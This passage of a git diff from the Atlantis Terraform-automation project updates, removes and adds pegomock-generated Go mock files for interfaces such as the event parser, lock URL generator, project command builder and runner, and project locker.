@@ -80,12 +112,14 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models
return ret0, ret1
}
-func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, error) {
+func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
params := []pegomock.Param{event}
- result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
var ret0 models.PullRequest
var ret1 models.Repo
- var ret2 error
+ var ret2 models.Repo
+ var ret3 models.User
+ var ret4 error
if len(result) != 0 {
if result[0] != nil {
ret0 = result[0].(models.PullRequest)
@@ -94,10 +128,16 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent)
ret1 = result[1].(models.Repo)
}
if result[2] != nil {
- ret2 = result[2].(error)
+ ret2 = result[2].(models.Repo)
+ }
+ if result[3] != nil {
+ ret3 = result[3].(models.User)
+ }
+ if result[4] != nil {
+ ret4 = result[4].(error)
}
}
- return ret0, ret1, ret2
+ return ret0, ret1, ret2, ret3, ret4
}
func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) {
@@ -208,6 +248,33 @@ func (c *EventParsing_ParseGithubPull_OngoingVerification) GetAllCapturedArgumen
return
}
+func (verifier *VerifierEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) *EventParsing_ParseGithubPullEvent_OngoingVerification {
+ params := []pegomock.Param{pullEvent}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubPullEvent", params)
+ return &EventParsing_ParseGithubPullEvent_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type EventParsing_ParseGithubPullEvent_OngoingVerification struct {
+ mock *MockEventParsing
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetCapturedArguments() *github.PullRequestEvent {
+ pullEvent := c.GetAllCapturedArguments()
+ return pullEvent[len(pullEvent)-1]
+}
+
+func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetAllCapturedArguments() (_param0 []*github.PullRequestEvent) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*github.PullRequestEvent, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*github.PullRequestEvent)
+ }
+ }
+ return
+}
+
func (verifier *VerifierEventParsing) ParseGithubRepo(ghRepo *github.Repository) *EventParsing_ParseGithubRepo_OngoingVerification {
params := []pegomock.Param{ghRepo}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubRepo", params)
diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go
deleted file mode 100644
index f3c9ce749b..0000000000
--- a/server/events/mocks/mock_executor.go
+++ /dev/null
@@ -1,76 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: Executor)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-type MockExecutor struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockExecutor() *MockExecutor {
- return &MockExecutor{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResponse {
- params := []pegomock.Param{ctx}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
- var ret0 events.CommandResponse
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(events.CommandResponse)
- }
- }
- return ret0
-}
-
-func (mock *MockExecutor) VerifyWasCalledOnce() *VerifierExecutor {
- return &VerifierExecutor{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierExecutor {
- return &VerifierExecutor{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierExecutor {
- return &VerifierExecutor{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierExecutor struct {
- mock *MockExecutor
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierExecutor) Execute(ctx *events.CommandContext) *Executor_Execute_OngoingVerification {
- params := []pegomock.Param{ctx}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
- return &Executor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type Executor_Execute_OngoingVerification struct {
- mock *MockExecutor
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *Executor_Execute_OngoingVerification) GetCapturedArguments() *events.CommandContext {
- ctx := c.GetAllCapturedArguments()
- return ctx[len(ctx)-1]
-}
-
-func (c *Executor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*events.CommandContext, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*events.CommandContext)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_lock_url_generator.go b/server/events/mocks/mock_lock_url_generator.go
index 0a31fc85f8..8a62a2c3b2 100644
--- a/server/events/mocks/mock_lock_url_generator.go
+++ b/server/events/mocks/mock_lock_url_generator.go
@@ -17,9 +17,16 @@ func NewMockLockURLGenerator() *MockLockURLGenerator {
return &MockLockURLGenerator{fail: pegomock.GlobalFailHandler}
}
-func (mock *MockLockURLGenerator) SetLockURL(_param0 func(string) string) {
- params := []pegomock.Param{_param0}
- pegomock.GetGenericMockFrom(mock).Invoke("SetLockURL", params, []reflect.Type{})
+func (mock *MockLockURLGenerator) GenerateLockURL(lockID string) string {
+ params := []pegomock.Param{lockID}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("GenerateLockURL", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem()})
+ var ret0 string
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ }
+ return ret0
}
func (mock *MockLockURLGenerator) VerifyWasCalledOnce() *VerifierLockURLGenerator {
@@ -40,28 +47,28 @@ type VerifierLockURLGenerator struct {
inOrderContext *pegomock.InOrderContext
}
-func (verifier *VerifierLockURLGenerator) SetLockURL(_param0 func(string) string) *LockURLGenerator_SetLockURL_OngoingVerification {
- params := []pegomock.Param{_param0}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "SetLockURL", params)
- return &LockURLGenerator_SetLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+func (verifier *VerifierLockURLGenerator) GenerateLockURL(lockID string) *LockURLGenerator_GenerateLockURL_OngoingVerification {
+ params := []pegomock.Param{lockID}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GenerateLockURL", params)
+ return &LockURLGenerator_GenerateLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
-type LockURLGenerator_SetLockURL_OngoingVerification struct {
+type LockURLGenerator_GenerateLockURL_OngoingVerification struct {
mock *MockLockURLGenerator
methodInvocations []pegomock.MethodInvocation
}
-func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetCapturedArguments() func(string) string {
- _param0 := c.GetAllCapturedArguments()
- return _param0[len(_param0)-1]
+func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetCapturedArguments() string {
+ lockID := c.GetAllCapturedArguments()
+ return lockID[len(lockID)-1]
}
-func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []func(string) string) {
+func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []string) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
- _param0 = make([]func(string) string, len(params[0]))
+ _param0 = make([]string, len(params[0]))
for u, param := range params[0] {
- _param0[u] = param.(func(string) string)
+ _param0[u] = param.(string)
}
}
return
diff --git a/server/events/mocks/mock_project_command_builder.go b/server/events/mocks/mock_project_command_builder.go
new file mode 100644
index 0000000000..f779acab36
--- /dev/null
+++ b/server/events/mocks/mock_project_command_builder.go
@@ -0,0 +1,175 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandBuilder)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockProjectCommandBuilder struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectCommandBuilder() *MockProjectCommandBuilder {
+ return &MockProjectCommandBuilder{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) ([]models.ProjectCommandContext, error) {
+ params := []pegomock.Param{ctx}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("BuildAutoplanCommands", params, []reflect.Type{reflect.TypeOf((*[]models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 []models.ProjectCommandContext
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].([]models.ProjectCommandContext)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) {
+ params := []pegomock.Param{ctx, commentCommand}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("BuildPlanCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 models.ProjectCommandContext
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(models.ProjectCommandContext)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) {
+ params := []pegomock.Param{ctx, commentCommand}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("BuildApplyCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 models.ProjectCommandContext
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(models.ProjectCommandContext)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalledOnce() *VerifierProjectCommandBuilder {
+ return &VerifierProjectCommandBuilder{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandBuilder {
+ return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandBuilder {
+ return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectCommandBuilder struct {
+ mock *MockProjectCommandBuilder
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification {
+ params := []pegomock.Param{ctx}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildAutoplanCommands", params)
+ return &ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification struct {
+ mock *MockProjectCommandBuilder
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetCapturedArguments() *events.CommandContext {
+ ctx := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*events.CommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*events.CommandContext)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification {
+ params := []pegomock.Param{ctx, commentCommand}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildPlanCommand", params)
+ return &ProjectCommandBuilder_BuildPlanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildPlanCommand_OngoingVerification struct {
+ mock *MockProjectCommandBuilder
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) {
+ ctx, commentCommand := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*events.CommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*events.CommandContext)
+ }
+ _param1 = make([]*events.CommentCommand, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(*events.CommentCommand)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification {
+ params := []pegomock.Param{ctx, commentCommand}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildApplyCommand", params)
+ return &ProjectCommandBuilder_BuildApplyCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildApplyCommand_OngoingVerification struct {
+ mock *MockProjectCommandBuilder
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) {
+ ctx, commentCommand := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*events.CommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*events.CommandContext)
+ }
+ _param1 = make([]*events.CommentCommand, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(*events.CommentCommand)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_project_command_runner.go b/server/events/mocks/mock_project_command_runner.go
new file mode 100644
index 0000000000..cf5555e8d3
--- /dev/null
+++ b/server/events/mocks/mock_project_command_runner.go
@@ -0,0 +1,116 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandRunner)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockProjectCommandRunner struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectCommandRunner() *MockProjectCommandRunner {
+ return &MockProjectCommandRunner{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectCommandRunner) Plan(ctx models.ProjectCommandContext) events.ProjectCommandResult {
+ params := []pegomock.Param{ctx}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Plan", params, []reflect.Type{reflect.TypeOf((*events.ProjectCommandResult)(nil)).Elem()})
+ var ret0 events.ProjectCommandResult
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(events.ProjectCommandResult)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockProjectCommandRunner) Apply(ctx models.ProjectCommandContext) events.ProjectCommandResult {
+ params := []pegomock.Param{ctx}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Apply", params, []reflect.Type{reflect.TypeOf((*events.ProjectCommandResult)(nil)).Elem()})
+ var ret0 events.ProjectCommandResult
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(events.ProjectCommandResult)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalledOnce() *VerifierProjectCommandRunner {
+ return &VerifierProjectCommandRunner{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandRunner {
+ return &VerifierProjectCommandRunner{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandRunner {
+ return &VerifierProjectCommandRunner{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectCommandRunner struct {
+ mock *MockProjectCommandRunner
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectCommandRunner) Plan(ctx models.ProjectCommandContext) *ProjectCommandRunner_Plan_OngoingVerification {
+ params := []pegomock.Param{ctx}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Plan", params)
+ return &ProjectCommandRunner_Plan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandRunner_Plan_OngoingVerification struct {
+ mock *MockProjectCommandRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandRunner_Plan_OngoingVerification) GetCapturedArguments() models.ProjectCommandContext {
+ ctx := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandRunner_Plan_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.ProjectCommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.ProjectCommandContext)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierProjectCommandRunner) Apply(ctx models.ProjectCommandContext) *ProjectCommandRunner_Apply_OngoingVerification {
+ params := []pegomock.Param{ctx}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Apply", params)
+ return &ProjectCommandRunner_Apply_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandRunner_Apply_OngoingVerification struct {
+ mock *MockProjectCommandRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandRunner_Apply_OngoingVerification) GetCapturedArguments() models.ProjectCommandContext {
+ ctx := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandRunner_Apply_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.ProjectCommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.ProjectCommandContext)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_project_lock.go b/server/events/mocks/mock_project_lock.go
new file mode 100644
index 0000000000..b28b6d2206
--- /dev/null
+++ b/server/events/mocks/mock_project_lock.go
@@ -0,0 +1,98 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectLocker)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+ models "github.com/runatlantis/atlantis/server/events/models"
+ logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockProjectLocker struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectLocker() *MockProjectLocker {
+ return &MockProjectLocker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*events.TryLockResponse, error) {
+ params := []pegomock.Param{log, pull, user, workspace, project}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((**events.TryLockResponse)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 *events.TryLockResponse
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(*events.TryLockResponse)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectLocker) VerifyWasCalledOnce() *VerifierProjectLocker {
+ return &VerifierProjectLocker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectLocker {
+ return &VerifierProjectLocker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectLocker {
+ return &VerifierProjectLocker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectLocker struct {
+ mock *MockProjectLocker
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) *ProjectLocker_TryLock_OngoingVerification {
+ params := []pegomock.Param{log, pull, user, workspace, project}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
+ return &ProjectLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectLocker_TryLock_OngoingVerification struct {
+ mock *MockProjectLocker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectLocker_TryLock_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.PullRequest, models.User, string, models.Project) {
+ log, pull, user, workspace, project := c.GetAllCapturedArguments()
+ return log[len(log)-1], pull[len(pull)-1], user[len(user)-1], workspace[len(workspace)-1], project[len(project)-1]
+}
+
+func (c *ProjectLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.PullRequest, _param2 []models.User, _param3 []string, _param4 []models.Project) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*logging.SimpleLogger, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*logging.SimpleLogger)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ _param2 = make([]models.User, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(models.User)
+ }
+ _param3 = make([]string, len(params[3]))
+ for u, param := range params[3] {
+ _param3[u] = param.(string)
+ }
+ _param4 = make([]models.Project, len(params[4]))
+ for u, param := range params[4] {
+ _param4[u] = param.(models.Project)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_project_pre_executor.go b/server/events/mocks/mock_project_pre_executor.go
deleted file mode 100644
index cd36116f3a..0000000000
--- a/server/events/mocks/mock_project_pre_executor.go
+++ /dev/null
@@ -1,85 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectPreExecutor)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
- models "github.com/runatlantis/atlantis/server/events/models"
-)
-
-type MockProjectPreExecutor struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockProjectPreExecutor() *MockProjectPreExecutor {
- return &MockProjectPreExecutor{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) events.PreExecuteResult {
- params := []pegomock.Param{ctx, repoDir, project}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.PreExecuteResult)(nil)).Elem()})
- var ret0 events.PreExecuteResult
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(events.PreExecuteResult)
- }
- }
- return ret0
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalledOnce() *VerifierProjectPreExecutor {
- return &VerifierProjectPreExecutor{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectPreExecutor {
- return &VerifierProjectPreExecutor{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectPreExecutor {
- return &VerifierProjectPreExecutor{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierProjectPreExecutor struct {
- mock *MockProjectPreExecutor
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) *ProjectPreExecutor_Execute_OngoingVerification {
- params := []pegomock.Param{ctx, repoDir, project}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
- return &ProjectPreExecutor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type ProjectPreExecutor_Execute_OngoingVerification struct {
- mock *MockProjectPreExecutor
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *ProjectPreExecutor_Execute_OngoingVerification) GetCapturedArguments() (*events.CommandContext, string, models.Project) {
- ctx, repoDir, project := c.GetAllCapturedArguments()
- return ctx[len(ctx)-1], repoDir[len(repoDir)-1], project[len(project)-1]
-}
-
-func (c *ProjectPreExecutor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []string, _param2 []models.Project) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*events.CommandContext, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*events.CommandContext)
- }
- _param1 = make([]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(string)
- }
- _param2 = make([]models.Project, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(models.Project)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_step_runner.go b/server/events/mocks/mock_step_runner.go
new file mode 100644
index 0000000000..5668e90ffd
--- /dev/null
+++ b/server/events/mocks/mock_step_runner.go
@@ -0,0 +1,88 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: StepRunner)
+
+package mocks
+
+import (
+ "reflect"
+
